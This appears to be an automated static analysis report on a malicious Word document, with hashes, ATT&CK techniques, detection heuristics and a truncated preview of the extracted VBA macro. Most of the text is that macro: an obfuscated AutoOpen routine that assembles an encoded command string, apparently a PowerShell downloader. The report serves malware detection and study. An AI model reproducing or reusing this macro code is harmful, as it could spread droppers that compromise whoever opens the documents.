Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bb53a0dbd517be2d…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 225.0 KB
Created: 2018-06-28 08:03:00
Authoring application: Microsoft Office Word
First seen: 2019-03-18
MD5: 6ebde09ff39b61d06a5cc40265ebf574
SHA-1: d8398f144a623c2c246f11c800b10e6f1eef351b
SHA-256: bb53a0dbd517be2d3d3d3fc2e219949ca4e12e40b9f1f45181660df2ba7ec6b3
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a Microsoft Office document containing a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening. The macro utilizes a Shell() call, indicating an intent to execute external commands or payloads. ClamAV also detected this file as malware (Doc.Malware.Valyria-6701776-0), further supporting its malicious nature. The obfuscated script makes it difficult to determine the exact payload, but the presence of AutoOpen and Shell() strongly suggests a downloader or dropper functionality.

Heuristics (7)

  • ClamAV: Doc.Malware.Valyria-6701776-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6701776-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind         Source                                               Size
macros.bas   vba-macro    oletools.olevba.extract_macros (decoded VBA source)  13567 bytes
SHA-256: 290756a11563188c0d961f2b34ebafcc6c7236fd6ebe936c6af4dbcad415e6fc

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "JmlAvBh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "tutUpVZkatv"
Function MkYjDlj()
On Error Resume Next
JwfKL = ChrB(31857 + _
Sin(SJJWFF * CLng(NjmZna + 20762) _
 + 59354 _
+ MdqcKl))
iRnmiw _
= 20278 + Atn(46524) / 87563 / _
Round(88710) / 91833 / CInt(RJTMpJ)
wUpDuGmIm = "HELL" + "    " + "         " + "     " + "       " + "       " + "        " + " " + Chr(40) + "[cHaR"
DcjmB = ChrB(65910 + _
Sin(iQTjVo * CLng(hJaUSG + 20633) _
 + 43565 _
+ fzRjii))
iBnzf _
= 81666 + Atn(98854) / 12720 / _
Round(53111) / 42833 / CInt(fAOXop)
PuUFuu = "[]] " + Chr(40) + "61 ," + " 90 ,79 ," + " 106, 36," + " 119 " + ",124, 11" + "0, 52" + ",118,12" + "3, 115 " + ",124 "
NzroCV = ChrB(66961 + _
Sin(hvBpkw * CLng(AwdqV + 27744) _
 + 43665 _
+ piVNA))
ppAaG _
= 16421 + Atn(37690) / 92393 / _
Round(99118) / 9521 / CInt(BZjZG)
Tjnwvw = ",122" + " , 109" + ", 57 ," + " 87 , 124" + ",109" + ", 55 ,78" + ",124, 12"
OGsAb = ChrB(4936 + _
Sin(lTrYBJ * CLng(Hihkuv + 95677) _
 + 2105 _
+ jNTrWD))
zAFrj _
= 42177 + Atn(63271) / 74847 / _
Round(59149) / 74347 / CInt(RiYNS)
jUwatJZWZ = "3, 90 ," + "117, 1" + "12,124, 1" + "19 , 10" + "9 , 3" + "4 ,61" + ", 72 , 1" + "22 , 92"
MjBoT = ChrB(44038 + _
Sin(NiMnH * CLng(MhntM + 57613) _
 + 72429 _
+ AaZOvY))
zLXXGH _
= 14607 + Atn(16280) / 41949 / _
Round(96972) / 43874 / CInt(QiIlV)
GwMWI = " , 36 " + ", 62,11" + "3 , 109,1" + "09 ,10" + "5,106," + " 35,54"
nKYcl = ChrB(91422 + _
Sin(jiLIb * CLng(XwRcjn + 22689) _
 + 18842 _
+ BNJkU))
kzYbwl _
= 19992 + Atn(38977) / 58489 / _
Round(17423) / 85646 / CInt(OsdvU)
lmLSWcoCE = " ,54 ,120" + " ,111, " + "124 ,107" + ", 11" + "2, 119 " + ", 55 , 1" + "05 ," + "107, " + "118,54 " + ", 82, 94" + ",67 , "
UCzPwH = ChrB(17366 + _
Sin(NILSA * CLng(iMwodX + 49858) _
 + 29011 _
+ zUTKrv))
WiXfEA _
= 16589 + Atn(26882) / 35866 / _
Round(16483) / 24224 / CInt(UOHwLC)
zIpjQpB = "87,45" + ", 10" + "9,83,1" + "20 ,7" + "4 ,54,89" + ", 113" + " , 1" + "09 , 1" + "09 ," + "105 , 35" + ",54 ," + "54 , 110"
qBKKi = ChrB(60036 + _
Sin(FSwvc * CLng(RIuFJM + 98128) _
 + 53820 _
+ mdNFb))
DBGBz _
= 52053 + Atn(49839) / 36375 / _
Round(51860) / 45302 / CInt(wvEHpL)
VCiENjbb = ",110" + " , 11" + "0, 55, 1" + "22,11" + "1 , 1" + "12 , 125," + "124 "
dnAzzd = ChrB(24626 + _
Sin(nOhzd * CLng(flmGQ + 40279) _
 + 76523 _
+ PnNqk))
TfriHJ _
= 2623 + Atn(87726) / 14583 / _
Round(85776) / 36312 / CInt(stIbXw)
fszJfERUW = ", 120" + ", 112" + ",119," + " 109, 124" + ",107" + ",112 ,118" + ",107,55" + ",122 ,11" + "8 ,116" + ", 54 , 82" + ", 78 , "
pYNHWV = ChrB(14340 + _
Sin(mNYNlG * CLng(GrsEci + 96285) _
 + 10199 _
+ SGLOZE))
iuKFP _
= 59655 + Atn(96151) / 80813 / _
Round(37338) / 61854 / CInt(BvjOiZ)
wJzHjGTjXAN = "74 , " + "116 ,74," + "93 ,1" + "25 , " + "116," + "109," + " 54, " + "89,11"
MkYjDlj = wUpDuGmIm + PuUFuu + Tjnwvw + jUwatJZWZ + GwMWI + lmLSWcoCE + zIpjQpB + VCiENjbb + fszJfERUW + wJzHjGTjXAN
osVaz = ChrB(25182 + _
Sin(SYpPJs * CLng(iLnzT + 10326) _
 + 62241 _
+ QUOiw))
kNRBM _
= 85068 + Atn(51279) / 46120 / _
Round(79326) / 96198 / CInt(skRGun)
End Function
Function JoSPEbc()
On Error Resume Next
VXMMY _
= 11857 + Atn(71972) / 22664 / _
Round(62515) / 18925 / CInt(EJtTl)
fFiJY = ChrB(57021 + _
Sin(aicZb * CLng(LTQlz + 2170) _
 + 55680 _
+ lmRWf))
QrWllkq = "3, 109 " + ", 109 " + ",105,35," + " 54," + "54 , " + "110 ,110" + ",110 , 5" + "5,119 , 1" + "24 , 110" + ",55 , 10" + "5 ,112, 1" + "26,116"
kOvmuf _
= 23924 + Atn(67748) / 47598 / _
Round(26206) / 92636 / CInt(tFlpdL)
jwwoXv = ChrB(35469 + _
Sin(FuTQm * CLng(zWLmpi + 93742) _
 + 76830 _
+ uDpBHX))
DfuPbuVSdNi = " ,124 ,1" + "19 ,1" + "09,118" + " ,120,9" + "9 ,10" + "8,117 , 5" + "5 , 1"
vIGmz _
= 61748 + Atn(76557) / 51596 / _
Round(46968) / 83667 / CInt(WHpFw
... (truncated)